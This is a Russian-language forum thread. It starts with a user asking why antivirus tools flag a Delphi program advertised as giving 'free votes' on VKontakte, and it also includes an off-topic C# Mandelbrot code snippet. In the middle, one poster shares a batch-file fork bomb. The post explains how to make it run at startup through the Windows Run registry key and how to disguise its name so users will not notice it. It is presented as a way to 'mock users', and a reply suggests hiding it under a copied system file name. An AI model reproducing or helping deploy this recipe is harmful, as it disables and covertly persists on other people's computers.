Вот когда они в повседневную жизнь войдут, ты их новые и будешь разрабатывать. "Мониторы? Уже поздно! Ан нет! Придумаю ка я ЖК монитор!" Вот так же и ты!
Diamond00744, может ты библиотеку какую-то специфическую использовал там? Ведь не обязательно вся прога вирус, достаточно одну функцию какую-то.
P.S: я знаю о вирусах, которые сами приписываются к проектам на делфи и при компиляции включаются в них. То есть рекомендую открыть исходный проект и посмотреть подключаемые модули.
IwanS спасибо тебе огромное за понимание, я думал, меня с форума отправят куда подальше.
Я только в этой программе использовал сжатие UPX. Снизился размер с 1,6 Мб до где-то 400-600 Кб. Может, оно вызывает подозрение.
Нет, пересобрал EXE. Без сжатия и архивации отправил на VirusTotal. 6/42. Это не UPX. Возможно, простые слова "бесплатные голоса в контакте" вызывают подозрения у антивирусов =)).
Еще возможность, почему определяется вирусом - у меня при нажатии на кнопку подряд выводятся 10 окон с сообщениями (не одновременно, а первое окно - ОК - второе - ОК - третье...). Это возможно?
Программа пароля не просит, сис. файлы не меняет, в Интернет не выходит
Diamond00744, а ты не мог бы дать листинг заголовка твоего проекта. Ну где uses <....> и до слова begin. Верхнюю часть основного файла. Мне интересно, какие библиотеки ты используешь, может быть дело в них.
P.S: Я в свое время упаковывал приложения с помощью ASPack (кажется так), проблем с ошибочным определением вирусов не было.
Насчет 10 подряд окошек... я так не делал, сказать ничего не могу. Теоретически возможно, но это было бы глупостью...
Diamond00744, это не серьезно. Какие-то 4 неизвестных антивируса детектят эвристикой чего-то невнятное (причем обрати внимание - одно и то же, скорее всего одни и те же базы кроме нормана) - это даже смотреть не стоит . Если касперский + дрвеб + нод32 + аваст ничего не видят - все норм.
одну фишку вспомнил мне тут один чел показал, теперь я вам показываю) но это все программисты наверно знают.. создаёте текстовый файл и пишете там %0 | %0 сохраняете под расширением *.cmd если вам удастся запустить его и вырубить хотя бы через диспетчер задач, тогда придётся немного усложнить %0 | %0 | %0
если и это вас не убеждает, можно написать так 123 0% | %0 пробуем, тестируем, издеваемся над юзерами) самый простой способ запихать в автозагрузу а ещё лучше в реестре прописать (для тех кто в танке Пуск-выполнить-regedit) в каталоге HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run создаем строковый параметр и в поле "Значение" задаём путь к нашему любимому *.cmd =) если вы хотите насолить опытному юзеру, придётся помаксимуму замаскировать его (ну, здесь уж кто на что горазд, главное, чтобы в процессах и в реестре название казалось безобидным=)) если у вас на всё это мало времени, то можно написать программку, которая сделает это за вас. я готов помочь если что))
есть такая интересная штука - фрактал. самый известный фрактал - множество Мандельброта. мне удалось раздобыть исходный код построения этого чудо-рисунка на C#
показать офф-топ
// <remarks> // Mandel.cs Copyright 2005, written by Pierre Leclercq // </remarks>
namespace Mandelbrot { public class Mandel { // // Protected fields //
public Mandel(System.Windows.Forms.ProgressBar pProgressBar) { m_ProgressBar = pProgressBar; }
// // Properties //
// // Public members //
public System.Drawing.Bitmap GetBitmap( int pImageWidth, int pImageHeight, double pXMin, double pXMax, double pYMin, double pYMax, int pMaxIterationCount) { try { int i = 0; int j = 0; int[][] lValues = new int[pImageHeight][];
for (i = 0; i < pImageHeight; i++) { lValues[i] = new int[pImageWidth]; }
for (j = 0; j < pImageHeight; j++) { for (i = 0; i < pImageWidth; i++) { GetColorFromLevel( lValues[j][i], pMaxIterationCount, out lRed, out lGreen, out lBlue);
protected void GetColorFromLevel( int pLevel, int pMaxIteration, out byte pRed, out byte pGreen, out byte pBlue) { double lRatio = (double)pLevel / (double)pMaxIteration;
и ехешник - прилагается, можно рассмотреть кое-какие детали если понравится - можете посмотреть в гугле разные фракталы, там и видео есть, но самому как-то приятно по нему поползать) хоть там и не такая крутая детализация) зы. самое интересное - на конце иглы =)
если вы хотите насолить опытному юзеру, придётся помаксимуму замаскировать его (ну, здесь уж кто на что горазд, главное, чтобы в процессах и в реестре название казалось безобидным=))
Зачем заморачиваться и пытаться выдумать безобидное название ? Не проще взять какое ни буть название из системы и продублировать его("наш любимый *.cmd") в другой системной папке ?
Зачем заморачиваться и пытаться выдумать безобидное название ? Не проще взять какое ни буть название из системы и продублировать его("наш любимый *.cmd") в другой системной папки ?